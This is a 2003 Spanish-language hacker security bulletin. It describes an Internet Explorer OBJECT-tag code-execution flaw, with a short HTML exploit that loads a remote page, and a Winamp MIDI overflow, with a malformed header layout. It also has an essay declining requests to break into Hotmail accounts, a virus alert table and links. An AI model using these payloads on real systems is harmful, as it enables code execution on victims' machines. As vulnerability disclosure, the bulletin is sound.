--------------------------------------------------------------------
Boletín de seguridad informática de [RootMode]
Nro: 5to boletín
Miércoles, 30 de Septiembre de 2003 [Re-Edited 21/10/03]
http://rootmode.com.ar
- ------------------------------------------------------------------
I N D I C E :

[1] Introducción
[2] Buggies
[3] Artículos
[4] Novedades Víricas
[5] Links
[6] The End

- ------------------------------------------------------------------
[1] Bueno..he aquí el boletín del mes pasado. :S
Desde ya pido disculpas por el atraso, pero una serie de situaciones
me llevaron a estar alejado del tema un tiempo.
Igualmente ya retome las riendas y en unos días recibirán el 6to
boletín correspondiente a este mes y ya en noviembre largamos con
todo
haciendo boletines quincenales. :)

==================================================================
[2] Buggies
==================================================================

 Problemas con el Internet Explorer
[----------------------------------]

Una vulnerabilidad en el IE causa la ejecución de código
automáticamente de forma transparente para el usuario.
La falla radica en el código HTML en el tratamiento de los TAG
[Object] que se usa para insertar ActiveX.
El parámetro que especifica la ruta remota de los objetos, no valida
los archivos a cargar.

Exploit:
/*
<html>
<object data="http://www.server.com/exploit.html">
</object>
</html>
*/

:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

 Ejecución de código en Winamp
[-----------------------------]

Para reproducir archivos Midi, Winamp utiliza una librería llamada
IN_MIDI.dll.
Las versiones anteriores a la 3.1 de esta librería, pueden permitir
la
ejecución de código por parte de un atacante.

Exploit:
En el parámetro "Track data size" se coloca el valor: 0xffffffff

Ej. by Luigi:
4 bytes  MIDI Header       "MThd"
4 bytes  Header data size  00000006
2 bytes  Format            0000
2 bytes  Number of tracks  0001
2 bytes  Divisions         0001
4 bytes  Track Header      "MTrk"
4 bytes  Track data size   ffffffff  <---  Bug
...      "aaaaaaaaaaaaaaaaaaaaa..."  <---  Fun
  
==================================================================
[3] Artículos
==================================================================
En este apartado, hoy hablare sobre un tema que; creo yo; es lo único
que tienen en mente todos los niños que ven una película sobre
hackers
o que escucharon en algún lugar: "Existen personas que entran en
sistemas..se llaman hackers y son re malos"
Ergo, todos los niñitos tienden a dedicarse al tema entrando a sitios
con calaveritas girando y fueguitos de colores; bajándose war tools
de
MSN; entrando a canales diciendo que son super hackers y probando
troyanos; entre otras miles de cosas.
Ahora bien, de que trata ese 'pensamiento'?
Hacking al servicio de Hotmail.

Comencemos..

* Intro ............................................ 1
* Pedido ........................................... 2
   - Invenciones ................................... 2.1
* E0F .............................................. 3

- ----------------------------------------------------------------------
1. [Intro]

Sobre el tema solo haré unos pedidos y aclararé algunas cosas, pero
nada más que eso.
Quizá en un futuro escriba un texto realmente completo sobre el tema;
léase: 'técnicas, mitos, programación y funcionamiento'. Pero no creo
que valga la pena..ya veremos.

- ----------------------------------------------------------------------
2. [Pedido]

Mi pedido es único y no requiere gran esfuerzo...
Basta de enviarme preguntas sobre como entrar a una cuenta ajena.

- --
2.1 [Invenciones]

Aquí colocaré uno de esos correos que me piden como entrar a una
cuenta.
* Porque?
Porque me parece una forma original de pedido, ya que siempre se usan
las excusas como: 'Mi novia me es infiel...necesito entrar'
[Las excusas que inventan a veces realmente dan mucha gracia]

[E-mail]:
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
From: "camilo" <kmilo*@hotmail.com>
To: info@rootmode.com.ar
Subject: pregunta urgente
Date: Tue, 02 Sep 2003 13:12:51 -0500

La semana pasada un amigo lo mataron y no se sabe quien, por eso
necesito ayuda, por que necesito revisar el correo de el a ver si
habia alguna amenaza, el favor es si me pudieran decir como entro al
correo de hotmail sino tengo la clave.

Muchas gRacias les quedare muy agradecido

Kmilo
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

- ----------------------------------------------------------------------
3. [E0F]

Bueno, eso es todo..

==================================================================
[4] Novedades víricas
==================================================================
Alertas:

Nombre               Tipo              Gravedad           Fecha
 
W32/Cuydoc          Troyano             Media          09/10/2003
W32/IRCBot.B        Troyano             Baja           07/10/2003
VBS/StartPage.D     Troyano             Baja           03/10/2003
W32/Logitall         Worm               Baja           01/10/2003
W32/Holar.I          Worm               Baja           28/09/2003
W32/Zombam.L        Troyano             Baja           26/09/2003
VBS/Tabe.B           Worm               Baja           24/09/2003
W32/Israz.B          Worm (P2P)         Baja           23/09/2003
W32/Swen             Worm               Alta           18/09/2003
W32/Patoo            Worm               Baja           16/09/2003

Fuente: virusattack

==================================================================
[6] Links
==================================================================

- - You wanted it? here it is..[Friend site]
http://www.adictosnet.com.ar [A site with NO dope] :)

- - Little magic dragon [Draco] ..new relase..
http://dracoscript.cjb.net

- - You look for a c00l forum? try this..[Note for kids: Go away]
http://www.lcu.com.ar/foro

- - Mari0 br0s is my friend..this is his site
http://www.elportalweb.com.ar

==================================================================
[7] The End
==================================================================
Bueno; esto es todo de momento..en unos días recibirán el boletín de
Octubre y como dije en la intro; en noviembre empezamos con los
quincenales. (Porque hablo en plural? no se..) ;)

Saludos..
           Zero_Byte    mailto:info@rootmode.com.ar
